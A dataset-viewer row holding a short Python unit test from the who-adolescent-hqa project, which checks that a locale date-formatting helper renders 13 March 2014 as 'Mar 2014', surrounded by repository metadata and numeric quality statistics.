| 39.493467 | 120 | 0.398027 | 9,691 | 51,381 | 2.105665 | 0.062119 | 0.032245 | 0.02514 | 0.018818 | 0.559247 | 0.501372 | 0.488925 | 0.458787 | 0.447711 | 0.415613 | 0 | 0.267166 | 0.350052 | 51,381 | 1,300 | 121 | 39.523846 | 0.343884 | 0.477141 | 0 | 0.210031 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.094044 | false | 0 | 0.003135 | 0 | 0.191223 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
82fd5f6809fb42f949672cc3ffadb163579bff2e | 418 | py | Python | whoahqa/tests/utils/test_format_locale_date.py | onaio/who-adolescent-hqa | 108a7e60b025d0723247f5f02eab2c4d41f5a02a | [
"Apache-2.0"
] | null | null | null | whoahqa/tests/utils/test_format_locale_date.py | onaio/who-adolescent-hqa | 108a7e60b025d0723247f5f02eab2c4d41f5a02a | [
"Apache-2.0"
] | 2 | 2018-01-09T08:58:11.000Z | 2019-01-18T09:20:14.000Z | whoahqa/tests/utils/test_format_locale_date.py | onaio/who-adolescent-hqa | 108a7e60b025d0723247f5f02eab2c4d41f5a02a | [
"Apache-2.0"
] | null | null | null | import unittest
from datetime import date
from pyramid import testing
from whoahqa.utils import format_date_for_locale
class TestLocaleDate(unittest.TestCase):
def test_returns_date_string_as_per_request_locale(self):
request = testing.DummyRequest()
formatted_date = format_date_for_locale(
date(2014, 3, 13), "MMM Y", request)
self.assertEqual(formatted_date, "Mar 2014")
| 27.866667 | 61 | 0.746411 | 54 | 418 | 5.5 | 0.592593 | 0.06734 | 0.087542 | 0.127946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.184211 | 418 | 14 | 62 | 29.857143 | 0.83871 | 0 | 0 | 0 | 0 | 0 | 0.0311 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.